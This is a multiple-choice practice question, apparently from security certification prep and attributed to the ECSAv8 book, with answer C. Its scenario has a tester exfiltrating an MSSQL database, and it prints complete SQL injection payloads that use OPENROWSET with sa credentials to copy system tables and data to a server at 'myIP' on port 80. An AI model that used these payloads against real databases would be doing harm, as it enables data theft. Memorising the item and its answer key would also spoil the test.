A penetration tester tries to transfer the database from the target machine to a different
machine. For this, he uses OPENROWSET to link the target database to his own database,
replicates the database structure, and transfers the data to his machine by via a connection
to the remote machine on port 80.
The query he used to transfer databases was:
‘; insert into OPENROWSET
(‘SQLoledb’,’uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;’, ‘select * from
mydatabase..hacked_sysdatabases’) select * from master.dbo.sysdatabases –
The query he used to transfer table 1 was:
‘; insert into OPENROWSET(‘SQLoledb’,
‘uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;’, ‘select * from
mydatabase..table1′) select * from database..table1 –
What query does he need in order to transfer the column?
A.
‘; insert into
OPENROWSET(‘SQLoledb’,’uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,8
0;’,’select * from mydatabase..hacked_syscolumns’) select * from
user_database.dbo.systables –
B.
‘; insert into
OPENROWSET(‘SQLoledb’,’uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,8
0;’,’select * from mydatabase..hacked_syscolumns’) select * from
user_database.dbo.sysrows –
C.
‘; insert into
OPENROWSET(‘SQLoledb’,’uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,8
0;’,’select * from mydatabase..hacked_syscolumns’) select * from
user_database.dbo.syscolumns –
D.
‘; insert into
OPENROWSET(‘SQLoledb’,’uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,8
0;’,’select * from mydatabase..hacked_syscolumns’) select * from
user_tables.dbo.syscolumns –
C- According to ECSAv8 Book
One of our guests not too long ago proposed the following website.